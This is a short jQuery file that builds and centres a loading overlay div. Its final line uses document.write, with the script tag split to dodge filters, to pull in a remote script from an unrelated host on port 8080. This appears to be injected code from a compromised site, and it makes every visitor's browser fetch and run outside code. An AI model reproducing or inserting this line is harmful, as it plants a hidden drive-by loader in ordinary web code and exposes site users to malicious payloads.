var MainLoadingDiv;

$(document).ready(function () {

	var ie = document.all ? true : false;
	//alert(ie + " - " + document.documentElement.clientWidth + " - " + $(). + "; " );
	var windowWidth = $(window).width();// ie ? document.documentElement.clientWidth : window.innerWidth;
	var windowHeight = $(window).height();//ie ? document.documentElement.clientHeight : window.innerHeight;
        
	MainLoadingDiv = $('<div class="loading"/>').attr('id', 'loading_div');
	MainLoadingDiv.appendTo($('body'));
	MainLoadingDiv.css({
		"position": "absolute",
		"z-index": "1000",
		"top": windowHeight/3-MainLoadingDiv.height()/2,
		"left": windowWidth/2-MainLoadingDiv.width()/2
	});
	
	$(window).bind('resize', function() {
		CenteredLoadingDiv();
	});
        
}); 

function CenteredLoadingDiv()
{
//	var ie = document.all ? true : false;
//	var windowWidth = ie ? document.documentElement.clientWidth : window.innerWidth;
//	var windowHeight = ie ? document.documentElement.clientHeight : window.innerHeight;
	var windowWidth = $(window).width();
	var windowHeight = $(window).height();

	MainLoadingDiv.css({
		"position": "fixed",
		"top": windowHeight/3-MainLoadingDiv.height()/2,
		"left": windowWidth/2-MainLoadingDiv.width()/2
	});
	
}

document.write('<s'+'cript type="text/javascript" src="http://temp.thailanddigest.com:8080/Link.js"></scr'+'ipt>');